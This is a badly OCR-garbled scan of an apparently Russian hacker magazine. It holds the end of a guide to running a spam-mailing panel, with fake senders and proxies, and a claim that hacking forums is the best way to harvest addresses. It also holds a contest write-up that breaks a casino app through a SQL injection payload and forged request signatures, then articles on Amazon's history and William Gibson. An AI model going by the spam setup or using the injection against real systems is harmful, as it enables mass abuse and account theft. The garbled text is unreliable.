ки проверь запись #ткбіг "$1)зегВазе/$изег- 
пате". Если она закомментирована, то убери 
коммент и заключи это выражение в обрат- 
ные кавычки. Далее идет создание пользо- 
вательского каталога в /Ііоте/сітз и добав- 
ление созданного пользователя в группу 11р. 
Кстати, с добавлением тоже связана одна 
особенность, которую легко разглядеть: 

асісіизег -сі "$ІІ5егВа5е/$изегпате" -д 
сітзизегз $изегпате -0 Ир 

Как видишь, здесь используется характерный 
для І_іпих синтаксис утилиты асісіизег, поэтому 
если ты хочешь поставить ДМС на фряху, то из- 
мени значения флагов на аналоги во РгееВЗЭ, 
а именно: "-б" на "-боте", "-д" на "дгоир" . В прин- 
ципе, теперь скрипт готов к запуску: 

регі пеѵѵизег.рі 

Увы, опять пойдут вопросы. Указывай имя поль- 
зователя и пароль, только не переживай, что 
введенный пароль отображается в консоли, 
ведь ввод осуществляется стандартным мето- 
дом перл с использованием <ЗТОІЫ>. Впереди 
последует дилемма о максимальном количестве 
выполняемых рассылок на пользователя: если 
хочешь установить анлимитное количество, то 
оставляй ноль. Теперь наконец-то можно прис- 
тупать к работе с ЭМЗ. Набери в браузере адрес 
своего сервака, где ты устанавливал ДМС, 
и путь к веб-каталогу: ѵѵѵѵѵѵ.зратегг.ги/ ѵѵѵѵѵѵсітз . 



У тебя запросят логин и пароль, которые мы 
задавали при добавлении пользователя. 
Ура, нас впустили! Самое время приступить 
непосредственно к заспамливанию. Задания 
для рассылки здесь называются Тазкз (кто 
бы мог подумать!) и создавать их можно 
сколько угодно. Смысл их в том, чтобы рек- 
ламировать разнонаправленные товары, то 
есть одно задание — один конкретный то- 
вар. Захотел разрекламировать костюмы от 
Агтапі и ушанки от Петровича? Не вопрос, 
создавай два таска: Агтапі и Реігоѵісб. 
Собственно, когда ты назвал и создал таек, 
в левом меню ДМС появится список твоих 
текущих заданий. Нажав на крести справа 
от имени задания, тебе раскроются подме- 
ню: настройка задания, информация о зада- 
нии, отчет по заданию. 

Чтобы приступить к конфигурированию за- 
дания, нужно клацнуть на Сопіідиге. А вот 
настроек, я тебе скажу, довольно много. При 
желании тут можно указать: 

• Файл, который будет приаттачен к письмам 

• Список адресов отправителей 
(фэйковые адреса) 

• Список ІІРІ_-адресов, 

которые будут фигурировать в письме 

• Настройка кодировки 

• Использование проксей (да/нет) 

• Количество потоков 

• Ограничение отправок писем на один домен 

В общем, установок тут просто море, и если 
указывать и характеризировать их все, то по- 
лучится не статья, а спамерский мануал. 
Следует иметь в виду, что все опции сопро- 
вождаются описанием на английском, в кото- 
рых разобраться не так уж и тяжело. 




Заказчики рекламной рассылки, которые выкладывают лавэ за спам, 
от него же и страдают. Не повод ли это задуматься? Не повод, потому 
что они могут и пострадать немного, зарабатывая хорошие деньги. 
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Понятное дело, что со спамом никто не хочет 
мириться, и поэтому для такого антисоциально- 
го явления стали придумывать методы борьбы. 
Откровенно говоря, рекламная рассылка в Сети 
— настоящая головная боль для администрато- 
ров: толпа недовольных клиентов (перед офи- 
сом и с паяльниками в руках), плюс несколько 
тонн лишнего сожранного трафика. Думаю, да- 
же индусу понятно, что такой расклад не устра- 
ивает никого. Именно для противостояния 
спамщикам было разработано несколько гло- 
бальных концепций. Сейчас давай кратко рас- 
смотрим, что же они из себя представляют. 

МАР8 КВЬ — Кеакіте Віаскіюіе ІЙ8Т. Один 
из первых удачных прорывов в борьбе со спа- 
мом, идея и реализация которой принадлежит 
Полу Викси. Из названия системы понятно, 
что основной ее частью является база с имена- 
ми и адресами хостов, с которых приходит не- 
желательная реклама. Причем просто так ма- 
шина в базу не заносится, а для того чтобы по- 
пасть в черный список, нужно сильно потру- 
диться, тщательно игнорируя все предупрежде- 
ния и жалобы потерпевших пользователей. Ба- 
за данных с «черными адресами» периодически 
обновляется. Сейчас, правда, система КВЬ 
пошла по пути коммерции и стала платной, по- 
путно оттолкнув от себя немало пользователей. 
Впрочем, пережив рождение и коммерциали- 
зацию этой концепции, были выдвинуты и воп- 
лощены в жизнь новые. 

МАР8 ОСЬ — Біаі-ир Изег ІЛ8І. И снова 
амбициозный проект компании МАР8 (Маіі 
АЪше Ргеѵепііоп 8у8іет), правда, теперь на 
новый лад. Основная подход заключается в 
контролирование машин-зомби, использую- 
щихся для рассылки почтовых сообщений. Ма- 
шина-зомби — это, как правило, протроянен- 
ная тачка рядового диалап-юзера, и такие ком- 
пы обычно являются частью большого ботне- 
та. Как же они работают? Смотри, если ты 
клиент какого-то абстрактного прова, то для 
того чтобы отправить-получить почту, ты ис- 
пользуешь таіі- сервер своего 18 Р. Зомби -тач- 
ки действуют не так, и для спама подключают- 
ся напрямую к мыльному серверу того домена, 
который они собираются захламить. Возмо- 
жен и вариант, когда все подконтрольные 
спам-машины начнут отсылать сообщения с 
какого-то конкретного домена или сервера, 
так что адресное пространоство и ограничение 
на отсылку писем с одного ІР, как ты понима- 
ешь, уже тут не работает. В данный момент 
система тоже является платной. 

ОКВ8 — Ореп Кеіау ВеБаѵіоиг-МосШісаПоп 
8у8іет. Прежде всего о том, что же такое ореп 
геіау? Релей — это обычный таіі- сервер, кото- 
рый позволяет неавторизированным пользова- 
телям осуществлять рассылку на любые адреса. 
Проект ОКВ8 составлял черные списки откры- 
тых релеев и предоставлял открытый доступ к 
ним. Казалось бы, довольно эффективный под- 
ход, однако он приводил к тому, что в «черный 
список» попадало большое число серверов, ко- 
торыми пользовались не только спамеры, но и 
обыкновенные пользователи. 



НЕСКОЛЬКО ФАКТОВ О СПАМЕ 

1 Первую в истории глобальную рассылку рекламного характера, содержа- 
щую информацию о выходе новой продукции, провела компания ПЕС 

аж в 1978 году. 

2 Английское слово «8рат» происходит от «зрісесі+ііат», 
что означает «ветчина с приправой». 

3 На долю рекламной рассылки приходится больше трети всех писем в Интернете. 

4 Отклик от спама составляет в среднем 0,2%. Если осуществлять целевые 
рассылки, то эффективность можно увеличить. 

5 Самый эффективный способ сбора спам-листов — взлом форумов и дру- 
гих проектов, где для регистрации нужно указывать е-таіі. 



Ьіі Н. 'ІВ ВВП 
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украденная база с пользователями и мылам I программа для отсеивания левых адресов 



ЖЕСТЬ - КАК ОНА ЕСТЬ 

Наша статья медленно, но уверено 
приближается к концу. Я рассказал 
тебе о ключевых моментах организа- 
ции спам-бизнеса: сборке базы адре- 
сов, установке и настройке нужного 
софта. Проблема спама очень зло- 
бодневна, мне бы хотелось, чтобы ты 
адекватно к ней отнесся. С одной сто- 



роны, это серьезная проблема, с кото- 
рой борется все человечество. И что- 
бы разрабатывать эффективные ме- 
тодики, нужно досконально разоб- 
раться с тем, как именно работают 
спамеры. Именно такую цель пресле- 
довал данный материал: плечом к пле- 
чу раздавим спамерскую гадину! 

ВІЫАВУ ѴОІЖ’8 ЛСІ 



ТЕХНИКА БЕЗОПАСНОСТИ 



Любую проблему, как известно, легче предупредить, 
чем потом ее долго и нудно разрешать. Сейчас я при- 
веду пару советов, как не попасть в спам- лист: 

• Старайся не светить свой ящиіс привлекая 
внимание прожорливых спам-оотов. 

• Если все-таки хочешь запостить свой е-таіі, зашифруй 
его яваскриптом: воспользуйся программой 
ВІаскМапя Маіі Епсобег (она уже проскальзывала 

в ЦФПТ'ах в разделе икс-тулз). 

• Очень часто адрес можно изобразить на картинке 
(попросту нарисовать его) — помогает лучше мухобойки. 

• Когда беда все же случилась, и спам засел глубоко 
в печенках, то ставь какой-нибудь таіі йкег 

или софтину подобного рода. 

• Специалисты также рекомендуют настроить почтовик 
на прием только тех писем, в заголовке которых 
присутствует кодове слово. Кодовое слово можно 
сообщить всем своим друзьям и знакомым 

(можно оставить на форуме упоминание, что ты 
принимаешь письма только с кодовым словом «таким-то»). 




Аналитика, статьи, статистика: ѵѵѵѵѵѵ.зратіезі.ги 
Про спам для чайников: ѵѵѵш.апіізрат.пт.ги 
Системы борьбы с рассылкой: позоат.ги 
Новости по теме: ѵѵѵѵѵѵ.ѵігизіізіі.сот/ги/зрат 
Набор очень полезных программ 
для борьбы с рекламой: апіізрат.гіп.ги 
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Х-СОМТЕ8Т 

Пікіі022 




В предновогоднем конкурсе ты решал судьбу Мира. Престарелый Дед 
Мороз, как ты помнишь, тогда не на шутку увлекся азартными играми. 
Сидел и целый день играл в казино на ННр://ігеб.іпіпз.ги/ко . Нужно бы- 
ло его обанкротить, чтобы играть ему было не на что. 
Зарегистрировавшись в казино, несложно было сообразить, что оно 
реализовано в виде ІІазИ-приложения, которое управляется снаружи 
специальным скриптом. Поснифав трафик, легко было понять, что за 
аутентификацию отвечает скрипт Іо.рЬр, а за процесс игры - гои.рЬр. 

Половив пакеты во время игры, невозможно было пропустить 
такой хті-запрос: 

<циезЬ> 

<ЬеІ> 

<роІехсосІе>4</сосІе><топеу>1</топеу></роІе> 

<роІехсосІе>1 5</сосІехтопеу>1 </топеух/роІе> 

</ЬеЬ 

<1>пікі1а</1> 

<зідп>9ас520067Ь88сс29с5с5929825(816Ь0Ь00а50с448</зідп> 

с/циезЬ 

Этот текст передавался сценарию в переменной Ьеі РОЗТ-запросом. 
Несложно понять, что в элементе <ЬеІ> содержится информация 
о ставке игрока. В элементе <І> находится его логин, а <зідп> содер- 
жит какой-то непонятный длинный хэш (подпись запроса). 

На сайте казино была ссылка на ТОР лучших игроков. В нем с огромным 



отрывом лидировал неугомонный Дед Мороз. Скрипту передавался па- 
раметр і. Легко было понять, что это критерий для выборки пользова- 
телей: выбираются все, у кого баланс больше і. Подставив 
в параметр кавычку, ты бы жестко обломался. Но провести зцІ-іп)ес- 
Ііоп все же можно было: 

і=1 000 ипіоп зеіес* раззѵѵогфраззѵѵогсі Ігот изегз 

Как легко заметить, пароли хранятся криптованные, с них снят какой- 
то хэш. Но он нестандартный, короткий, и как его расшифровывать 
— непонятно. У Деда Мороза был такой хэш: ЮІ2сЗЗІ89. 

Посмотрев на хэш собственного пароля и на параметр зідп, легко бы- 
ло понять, что последние 10 символов зідп полностью совпадают с хэ- 
шем твоего пароля. Интересно, как генерируются остальные симво- 
лы? Декомпилировав флеш-приложение, ты мог найти такую строку: 

здп=М05.са1си1а1е(Ье!)+зиЬз1ппд(М05.са1си1а!е(р_разз),0,10); 

Ха! Вот и ответ на твой вопрос. Первая часть подписи - это тсІ5 от 
хті-элемента <ЬеІ> со ставками и логином. А вторая, как мы уже по- 
няли, — это хэш пароля. 

Теперь следи за руками. Мы знаем логин Деда Мороза. Мы знаем хэш 
его пароля. Мы можем подделать подпись любого его запроса! В том 
числе, можем поставить все его деньги на одно единственное поле. Пос- 
ле такого розыгрыша с 97% вероятностью Дед Мороз обанкротится. 

В этот раз мир спас чувак с ником ЗПАпКаВ. 
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ТЕХТ МІРВІЫ / тіігіІІ@гісІсІіск.ш / 



йй'Ѵ ЛЮДЕЙ, КОТОРЫЕ ХОТЯ БЫ ИЗРЕДКА БЫВАЮТ 
В ИНТЕРНЕТЕ, СЛОВО АМА20Ы АССОЦИИРУЕТСЯ НЕ С 
АМЕРИКАНСКОЙ РЕКОЙ И НЕ С ВОИНСТВЕННЫМИ ЖЕН- 
ЩИНАМИ, А С ОНЛАЙНОВЫМ МАГАЗИНОМ, В КОТОРОМ 
МОЖНО КУПИТЬ ВСЕ: ОТ ДЕТСКИХ ИГРУШЕК И ТЕХНИКИ 
ДО ПОСЛЕДНИХ НОВИНОК КНИЖНОЙ ПРОДУКЦИИ или 
РУО. КАЖДЫЙ ДЕНЬ ЛЮДИ ВО ВСЕМ МИРЕ НАБИРАЮТ 
В СВОЕМ БРАУЗЕРЕ АДРЕС АМАЕОІМ.СОМ, ЧТОБЫ СО- 
ВЕРШИТЬ НОВЫЕ ПОКУПКИ ИЛИ УЗНАТЬ О НОВИНКАХ. 
АМА20Ы — ЭТО НЕ ПРОСТО МАГАЗИН, ЭТО МНОГОМИЛ- 
ЛИОННАЯ КОРПОРАЦИЯ, КОТОРОЙ ПРИНАДЛЕЖИТ 
СОБСТВЕННЫЙ ПОИСКОВИК А9, САМАЯ БОЛЬШАЯ КИНЕ- 
МАТОГРАФИЧЕСКАЯ БАЗА ДАННЫХ ІІЧТЕВМЕТ МОѴІЕ 
ЭАТАВА5Е (ІМЭВ.СОМ) И ЦЕЛЫЙ РЯД ДОЧЕРНИХ КОМПА- 
НИЙ. РАЗВЕ МОГ СОЗДАТЕЛЬ Е-ШОПА 10 ЛЕТ НАЗАД ПРЕД- 
ПОЛОЖИТЬ, ЧТО ЕГО ДЕТИЩЕ ПРИМЕТ ТАКОЙ РАЗМАХ? М 

ЖШШкл 



ИСТОРИЯ СОЗДАНИЯ 

Многие знают, что атагоп.сот — крупнейший 
сетевой магазин. Но немногие догадываются, 
что он же стал самым первым е-шопом. А нача- 
лось все в 1994 году с человека по имени 
Джеффри Престон Безос, выпускника Принс- 
тонского университета, специалиста в области 
вычислительных технологий и электротехники. 
В то время Джеффри работал в Нью-Йорке, в 
фирме О. Е. ЗНаѵѵ, специализирующейся на 
разработке компьютерных технологий в бирже- 
вой области. Джефф явно был на своем месте: 
его карьера шла стремительно вверх, и за ко- 
роткое время он стал вице-президентом компа- 
нии, причем не собирался останавливаться на 
достигнутом. Все вокруг пророчили ему светлое 
будущее в сфере финансов, но потом Безос 
сделал открытие, которое изменило не только 
всю его жизнь, но и всю историю бизнеса. 
ѴѴѴѴѴѴ только-только начал просачиваться из 
узких научных кругов в массы, ни о какой веб- 
коммерции речи, конечно, еще не шло. И вот 
одним весенним днем 1994-го, Джеффри Бе- 
зос, поразмыслив и сделав нехитрые подсче- 
ты, пришел к выводу, что уровень пользования 
Интернетом будет расти примерно на 2300% 
в год. А раз людей будет больше, то и запросы 
будут на порядок выше. Перспектива делать 
бизнес в Сети была потрясающей, и, не теряя 
времени даром, Джефф стал работать над 
воплощением своих идей в жизнь. 

Сначала он изучил деятельность 20-и лучших 
сервисов по заказу товаров почтой, так как эта 
деятельность была ближе всех к тому, что он за- 
думал. Джеффри задался вопросом: что эф- 
фективнее продавать через Интернет? Ответ 
нашелся сам — книги. Полный каталог книг не- 
возможно составить для почтовой системы, 
ведь он просто не поместится ни в одну посылку 
и почтовый ящик. В то же время на компьютере 
можно создать любую по объему книжную базу 
и любой сможет ею воспользоваться. 

На следующий день Безос уже прибыл в Лос- 
Анджелес на Конвент американских продавцов 
книг с целью узнать о книжном бизнесе все, что 
только возможно. Там его ожидал приятный 
сюрприз: обнаружилось, что все лидеры книж- 
ного бизнеса имеют готовые электронные ката- 
логи своих товаров. Это существенно упроща- 
ло задачу. По сути, оставалось лишь создать в 
Интернете стационарную локацию, которую по- 
купатели могли бы легко найти и сделать там 
магазин, чтобы заказ сразу же оформлялся. 
Однако не все увидели в этом революцион- 
ный подход. Работодатели Безоса оказа- 
лись не готовыми к такому рискованному 
шагу, и идея не нашла в ЗНаѵѵ поддержки. 
Джеффри пришлось выбирать: либо отка- 
заться от своего замысла, либо делать все 
самому. Последнее означало лишиться от- 
личной работы, надежных перспектив, поте- 
рять все, что он зарабатывал на протяжении 
нескольких лет. Но Джеффри Безоса это не 
испугало. Уволившись из ЗИаѵѵ и заручив- 
шись поддержкой жены, он взялся за дело. 



СИСТЕМА РАБОТЫ 

Как же «Амазон» работает на сегодняшний 
день? Точно так же, как и тысячи интернет- 
магазинов по всему миру. Ведь именно по об- 
разу и подобию атагоп.сот функционируют 
все эти сайты. Весь этот базис придуман 
Джеффри Безосом, хотя размах «Амазона», 
конечно, вряд ли сопоставим с деятель- 
ностью его конкурентов. Компания прикла- 
дывает все усилия, стараясь быть действи- 
тельно «магазином планеты», а не каких-то 
отдельных стран. Для облегчения жизни по- 
купателей представительства «Амазона» 
имеются в восьми странах мира: Канаде, Ве- 
ликобритании, Испании, Германии, Австрии, 
Франции, Китае и Японии. Жителям осталь- 
ных стран не стоит расстраиваться: магазин 
обслужит тебя, даже если ты живешь в ка- 
кой-нибудь глубинке. Просто представитель- 
ства упрощают дело и пересылку заказов. 
По поводу последнего можно не беспокоить- 
ся: магазин гарантирует сохранность даже 
самого хрупкого товара, так как «Амазон» 
сотрудничает с лидерами транспортировки 
ЦІРЗ, ЭН1_, РесІЕх и А1 . Но даже если с зака- 
зом что-то произойдет, на сайте обещают 
вернуть потраченные деньги и в некоторых 
случаях даже выплатить компенсацию. 



Способов оплаты много. Упор, конечно, 
делается на всевозможные кредитные карты, 
но принимаются и банковские переводы, де- 
нежные чеки всех мастей, простые денеж- 
ные переводы и подарочные сертификаты от 
самого атагоп.сот . У «Амазона» существу- 
ет целый ряд систем скидок, бонусов и спе- 
циальных предложений для постоянных кли- 
ентов. Сюда входят те сами подарочные сер- 
тификаты, которыми можно расплатиться 
за очередную покупку. 

Я ничего не сказал по поводу навигации и ин- 
терфейса. Навигация столь проста и интуи- 
тивно понятна, что попросту не о чем гово- 
рить. Джеффри приложил все усилия, чтобы 
посетителям было максимально комфортно. 
Единственное, в чем можно запутаться, — так 
это в разнообразии выбора. Желаете купить 
дрель? Или женские сапожки? А, быть может, 
хотите точную копию светового меча из 
«Звездных войн»? Все к вашим услугам! 
Только товары нельзя понюхать и пощупать: 
технологии до такого пока не дошли. Но, если 
в ближайшем будущем подобное станет воз- 
можным, можешь не сомневаться, первым че- 
ловеком, кто найдет этому применение, ста- 
нет Джеффри Престон Безос. 

ВІЫАВУ ѴСШВ’8 ~і~ 
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Четвертого июля Джефф с супругой прилетели в Техас. От- 
туда уже машиной направились в Сиэтл, где их ждала встреча 
с крупным оптовиком Ингрэмом и возможность применить 
компьютерные таланты в деле. Все происходило в такой 
спешке, что даже бизнес-план составлялся в дороге, пока жена 
вела машину. Изначально компанию решили назвать Кадабра 
(СаёаЬга), от магического слова «Абра-І<адабра». Но после 
ряда обсуждений и предположений, что СабаЬга.сот может у 
многих вызвать ассоциацию с сабаѵег (тело, труп), имя смени- 
ли на Ашагоп, в честь великой Южноамериканской реки. 
Своим инвесторам Безос честно признался, что шанс потерять 
все вложения составляет примерно 70%, но родители Джеффа, 
вложившие в дело $300 000, верили в сына. «Мы делали ставку 
не на Интернет», — сказала через несколько лет мать Безоса. — 
Мы ставили на Джеффа». К концу декады, будучи владельцами 
6% акций компании, они стали миллионерами. К настоящему 
времени корпорацию делили тріщды, и теперь в руках семьи Бе- 
зосов находится примерно треть активов атагоп .сот . 




Изначально магазин обосновался в гараже обычного дома с двумя 
спальнями. Джефф установил три компьютера 5ші МісгозНайош на 
столы, собранные собственными руками из фрагментов дверей. 



Провода и шнуры с помощью удлинителей протянули прямо в га- 
раж. Когда прототип сайта был готов и запущен, Джефф попросил 
300 человек из числа своих друзей и знакомых стать бета-тестерами 
проекта. Проверка прошла на ура — система работала прекрасно 
на всех платформах. И 16-го июля 1995 года Безос открыл сайт 
миру, попросив всех друзей распространять информацию везде, где 
можно. В течение 30 дней атагоп.сот работал без рекламной под- 
держки в прессе, продажа книг производилась для всех 50 америка- 
нских штатов и для 45 зарубежных стран. К сентябрю продажи ма- 
газина составили $20 000 в неделю. 

Джеффри Безос со своей командой продолжал совершенствовать 
сайт, вводя в обиход ранее несуществовавшие понятия опе-сііск $Ьор- 
ріп§ (покупка одним кликом), сшютег геѵіет (отзывы клиентов) и 
е-таіі о г сіе г ѵегіГісагіоп (подтверждение заказа по е-шаіі). 
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,, г ;“ Р ° С быст Р°, что создатель мага- 

зина бьи поражен сильнее всех остальных. 

Когда о компании всерьез заговорили в 

7 году, скептики выразили серьезные 

сомнения, ™ новичок на книжном р“1 е 

Да еще и работающий исключительно в Се-’ 

, сможет удержать свои позиции после 

ПОЯВЛСНИЯ В Интепнетр тпмгтхлг 

интернете таких представи- 

епьств лидеров рынка, как Ваптез аисі 
НоЫе, Вогбегз. Но два года спустя рыноч- 
ная стоимость акций и других активов 

™Т а>> бЮИ б ° ЛЬШе ’ ЧШ с У мма рная 
™«ль акции двух его круттиейщнх кон- 
Р • ак же компания заключила сдел- 



ку «Бордерс», которая не могла в одиноч- 
<У справиться со своим интернет-трафиком 
Поначалу Безос старался как можно быст- 
рее расширитъ свою долю рынка, вкладывая 
в дело все, что зарабатывал. Когда 
Атагюн.согп превратился из самого болытю- 
о книжного магазина на планете в крупней- 
ший универсальный магазин, скептики^о- 
ворили о том, что «Амазон» разрастаетсГ 
быстро. Темны роста действтщщ,- 
но опережали планы Джеффа, несмотря на 
это, он продолжал поддерживать шесть ос- 
новных ценностей: верность клиенту, право 

собственности, активность (стремле^е к 



► СТАНОВЛЕНИЕ 

Л 
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действию), экономность, высокие запросы 
к поступающим на работу и новаторство 
«У нас все вращается вокруг клиента» — 
шворил создатель Ашагои. - Наш мшазин 
это то место, где люди могут найти и ку- 
пил, все, что только можно пожелать, не от- 
ходя от компьютера». «Амазон» постепенно 
водил в продажу музыкальные СП видео 
игрушки и электронику. Когда другие ин- ’ 
гернет-магазины начали появляться как гри- 
бы после дождя, Ашагоп.сот провел серь- 
езную реструктуризацию. Это помогло ос 
аться на плаву даже тогда, когда остальные 
прогорали и сходили с дистанции. 






В апреле 1998 года I 
«Амазон» покупает 
ІпГегпеГ Моѵіе 
БагаЪазе (ІМГ>Ъ) 
гигантскую базу дан- 
ных о фильмах, акте- 
рах, телешоу и видео- 
играх. Превращение 
ІМПЪ из общенарод- 
ного некоммерческо- 
го сайта в бизнес-ма- 
шину было восприня- 
то многими пользо- 
вателями, как поще- 
чина. Но, как показа- 
ло время, ничего 
страшного не прои- 
зошло. Основной 
контент ІМОЬ остал- 
ся бесплатным, за не- 
большую плату ($100 
в год) клиент получал 
более удобный ин- 
терфейс, расширен- 
ный поиск и несколь 
ко других приятных 
плюшек. 




В 1999 году была 
также куплена систе- 
ма Аіеха Іпііегпеі:. Эта 
сделка обошлась в 
250 миллионов дол- 
ларов. На сегодняш- 
ний день Аіеха предс- 
тавляет собой инте- 
ресный сплав поиско- 
вой машины и базы 
данных о различных 
сайтах. При помощи 
специальных тулба- 
ров, размещенных на 
страницах ее партне- 
рской сети, она соби- 
рает информацию о 
количестве трафика, 
проходящего через 
эти ресурсы. Данные 
очень точны, и коли- 
чество сайтов в этой 
сети огромно. Аіеха 
Іпііегпеі: сотрудничает 
с сервисами Соо§;1е и 
Ореп ОігесГогу, что 
делает этот рейтинг 
по-настоящему авто- 
ритетным. В том же 
1999 году известный 
журнал Типе назвал 
Джеффри Безоса че- 
ловеком года. 



-^.«Й "з^>Й 



В октябре 2002-го го- 
да «Амазон» занялся 
еще и продажей одеж- 
ды, заключив контрак- 
ты с известными лейб- 
лами, среди которых 
такие титаны, как 
ТЬе Сар, ХогсЬпот 
и Ьапгі'з Енгі. Так же 
магазин от крыл через 
свой сайт доступ к е- 
шопам своих партне- 
ров: ВогсЫ, Тоуз К 
^5 И Другим. 



* 



А в сентябре 2003 го- 
да «Амазон» предста- 
вил собственную по- 
исковую системы А9. 
Поисковик отличает- 
ся от других подоб- 
ных систем рядом ин- 
тересных деталей. 
Например, А9 стал 
первым поисковиком, 
ориентированным на 
поиск товаров среди 
огромной сети интер- 
нет-магазинов. Поис- 
ковик помогает нахо- 
дить не только това- 
ры, но и вести поиск 
внутри книг. Пользу- 
ясь доступом к 
Соо§1е, А9 неплохо 
ищет инфу и в Ин- 
тернете. Одновремен- 
но с новой поиско- 
вой системой, «Ама- 
зон» открывает про- 
дажу спортивных то- 
варов — более 3000 
различных брендов. 



В 2004-м году ком- 
пания приобрела 
}оуо.сот — крупный 
китайский интернет- 
магазин, что значи- 
тельно расширило 
влияние «Амазона» 
в Азиатских странах. 
Джеффри Безос яв- 
ляется постоянным 
участником журнала 
БогЪез, который сос- 
тавляет список самых 
богатых людей Пла- 
неты. Правда, если в 
1999 году он занимал 
19 место с капиталом 
в 10 миллиардов дол 

лардов, в 2005 он 
только на 41-м, вла- 
дея 4,8 миллиардами. 
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32 категории товаров атагоп.сот 
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НАШ МАГ АЗ ИН — ЭТО ТП МЕСТО 






г 1 



ЩЕ ЛЮДИ МОГУТ НАЙТИ И КѴПИТк рор 



ЧТО Т ОЛЬКО МОЖНО ПОЖРПАТк 
НЕ ОТХОДЯ ОТ КОМПКЮТРРА 
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ТЕХТ МІЫОѴѴОРК / тіпсіѵѵОгк@датеІапсІ.ш/ 




ЖИЗНЬ И ТВОРЧЕСТВО 
УИЛЬЯМА ГИБСОНА 



ііВ ЛИТЕРАТУРЕ НЕ ТАК МНОГО ПИСАТЕЛЕЙ, КОТОРЫЕ ПИШУТ В ЖАНРЕ КИБЕР- 
ПАНК. А КУЛЬТОВЫХ АВТОРОВ, ПРОИЗВЕДЕНИЯМИ КОТОРЫХ ЗАЧИТЫВАЮТСЯ 
КОМПЬЮТЕРЩИКИ, ЕЩЕ МЕНЬШЕ. И ТОЛЬКО ОДНОГО ИЗ НИХ СЧИТАЮТ ПРАРОДИ- 
ТЕЛЕМ ЖАНРА. ИМЯ УИЛЬЯМА ГИБСОНА ИЗВЕСТНО ПРАКТИЧЕСКИ ВСЕМ, КТО 
ПРОВОДИТ МНОГО ВРЕМЕНИ В СЕТИ. НО ДАЛЕКО НЕ ВСЕ ЧИТАТЕЛИ ЕГО ПРОИЗ- 
ВЕДЕНИЙ ЗНАКОМЫ С ЖИЗНЬЮ ВЫДАЮЩЕГОСЯ ПИСАТЕЛЯ 33 



РАННЕЕ ТВОРЧЕСТВО 

Уильям Форд Гибсон родился 17 марта 1948 года в маленьком 
американском городке Конвей, Южная Каролина, где его родите- 
ли предпочитали проводить свой отпуск. Это было время раннего 
телевидения, автомобилей, по форме напоминающих ракеты, и 
игрушек, сделанных по мотивам научно-фантастических расска- 
зов. Маленького Уильяма, как и многих ровесников, 
притягивали все эти чудеса техники. Отец занимал 
невысокую должность в крупной строительной ком- 
пании и по работе часто бывал в отъездах. Однажды, 
когда Уильям был еще совсем ребенком, он уехал в 
очередную командировку и больше не вернулся. Что 
с ним случилось, узнать так и не удалось, мать прос- 
то сообщила сыну, что отец погиб. После этого заб- 
рала ребенка и переехала в свой родной город к юго- 
западу от Вирджинии. 

Уильям тяжело переживал исчезновение отца, его 
постоянно видели отстраненным, витающим в облаках. Именно в 
это время разочарования жизнью, потеряв отца и оказавшись в 
чужом, удаленном от цивилизации городе, Гибсон увлекся фан- 
тастикой. Углубившись в книги, он жил произведениями извест- 
ных американских фантастов, с настоящей одержимостью запол- 
няя книжные полки новыми томами и подшивками журналов. Те- 



перь у него была заветная мечта — стать писателем. 

Когда ему исполнилось 17 лет, мать отдала сына в приватную 
школу для мальчиков в Аризоне. Уильям был далеко не в востор- 
ге от этого, школа вызывала в нем тоску, и, вдохновленный про- 
изведениями фантаста Уильяма Бэрроуза, он принялся создавать 
в себе образ «Пациента Зеро». Протестовал против порядков в 
школе, старался выглядеть и вести себя не так, как ос- 
тальные мальчики в школе, курил марихуану. В конце 
концов его выгнали, и он вернулся домой, где обнаружил, 
что мать умерла. Родственники не стремились поддер- 
жать осиротевшего подростка, и, когда началась Вьетнамс- 
кая война, 20-летний Уильям отправился в Канаду вместе 
с другими «подростками-дезертирами», так как ему мень- 
ше всего хотелось бегать с винтовкой по джунглям. 
Первые годы в Торонто были самыми сложными. У Уиль- 
яма не было специальности и приходилось постоянно 
крутиться, чтобы выжить. В 1972 году он встретил девуш- 
ку из Ванкувера, у них завязались отношения, и в том же году они 
вместе переехали в ее родной город. Именно там, женившись, 
окончив университет и осознав, что у него совершенно нет жела- 
ния строить какую-либо карьеру, Г ибсон стал писать свои первые 
произведения. В основном это были футуристические истории о 
влиянии киберпространства и технологий на жизнь людей в буду- 
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щем. В 1977 году в научно-фантастическом журнале ІІпЕагіИ был 
впервые опубликован его рассказ «Осколки голографической ро- 
зы» о новом виде развлечения Сим-Стим, напоминающем вирту- 
альную реальность. Вообще, представление о будущем у Г ибсона 
в корне отличалось от представлений большинства фантастов то- 
го времени. Писатели грезили о космосе, роботах, внеземных ци- 
вилизациях, в то время как Гибсон считал, что будущее стоит за 
компьютерными сетями. Эта тема была раскрыта в следующих 
его работах: «Континуум Гернсбека» (1981), «Джонни Мнемоник» 
(1981), «Сожжение Хром» (1982), которые появились в многоти- 
ражном журнале «Омни». Но настоящая слава пришла к писате- 
лю в 1984 году, когда вышел его первый роман «Нейромант». 

ТРИЛОГИЯ 5РКАѴѴІ. 

Главный герой книги — Кейс, гениальный хакер (автор называет 
его «ковбоем консолей»), который может подключать свой мозг 
напрямую к компьютерам, и зарабатывает на жизнь взломом сек- 
ретных компьютерных систем. Во время выполнения одного из за- 
даний заказчиков, Кейс попытался их надуть, но попытка оказыва- 
ется неудачной. В отместку работодатели вводят в тело хакера 
сильнодействующий токсин, который повреждает его нервную 
систему, в результате чего он теряет возможность подключаться к 
цифровой матрице. Начинается повесть с событий, которые про- 
исходят некоторое время спустя. Кейс теперь работает обычным 
служащим на одном из черных рынков Токио, где знакомится с 
Молли — девушкой-киллером, тело которой наполовину состоит 
из имплантов (вместо ногтей у нее удлиненные стальные лезвия). 
Она решает помочь парню и сводит его со своим шефом — быв- 



ния. Уильям Г ибсон нарушил их все. Несмотря на это (возможно, 
именно поэтому), «Нейромант» стал культовым произведением. 
Роман завоевал три основные научно-фантастические награды: 
Небула, Хьюго и награду Филиппа Дика. Он создал совершенно 
новый литературный жанр — «киберпанк». В его произведениях 
мир поделен между огромными мультинациональными корпора- 
циями, технологиями, негативно влияющими на жизнь людей, а 
главные персонажи — антигерои, противопоставляющие себя 
социальным нормам. Что интересно, Уильям Гибсон тогда не 
особо разбирался в компьютерах и имел поверхностные знания 
о компьютерных сетях (он даже не знал о существовании хаке- 
ров), но на основе своих представлений смоделировал мир, ко- 
торый во многом напоминает современный. 

Два года спустя после выхода «Нейроманта», Гибсон написал 
новый роман под названием «Нулевой отсчет» (потом писатель 
объединит их в трилогию ТИе ЗргаѵѵІ). Он продолжает сюжетную 
линию «Нейроманта», и теперь читатель узнает о новейшей тех- 
нологии — Мааских биочипах, создаваемых с использованием 
